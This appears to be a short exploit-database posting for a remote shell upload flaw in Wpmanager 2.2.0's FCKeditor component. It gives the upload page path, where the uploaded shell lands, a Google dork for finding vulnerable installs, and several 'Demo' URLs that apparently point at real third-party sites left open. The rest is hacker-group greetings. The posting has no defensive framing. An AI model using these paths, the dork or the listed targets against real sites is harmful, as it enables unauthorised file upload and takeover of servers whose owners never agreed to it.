Wpmanager WPM version 2.2.0 suffers from a remote shell upload vulnerability.
79101a5bb7775eb158bcee44574673e167688c82df72f8056e12439bb86a5d94
#### # Exploit Title:Wpmanager version wpm 2.2.0 (FCKeditor) Remote File Upload
# Author: T0x!c
# Date : 26-02-2012
# Facebook Page: www.facebook.com/DzTem
# E-mail: Malik_99@hotmail.fr
# Category:: webapps
# Google Dork:intext:"WPM version 2.3.0 © 2005 / 2013 Wpmanager"
# Software : http://www.wpmanager.tonsite.biz/
# Version: 2.2.0
# Tested on: || Windows ||
####
===[ Exploit ]===
http://127.0.0.1/fckeditor/editor/filemanager/browser/default/frmupload.html
[ Shell ]
http://127.0.0.1 /UserFiles/file/YourFile.txt
# Demo :
http://wpm.site11.com/fckeditor/editor/filemanager/connectors/test.html
http://montqul.com/fckeditor/editor/filemanager/connectors/test.html
http://samcro.franceserv.eu/wpmanager_230/fckeditor/editor/filemanager/connectors/test.html
=================================**AlgeriansHackers**==================================
# Greets To : KedAns-Dz * Caddy-Dz * Kha&miX * Jago-dz * Amine Msd * Kalashinkov *
(exploit-id.com) , (1337day.com) , (dis9.com) , (Dz-Team.biz)
=======================================================================================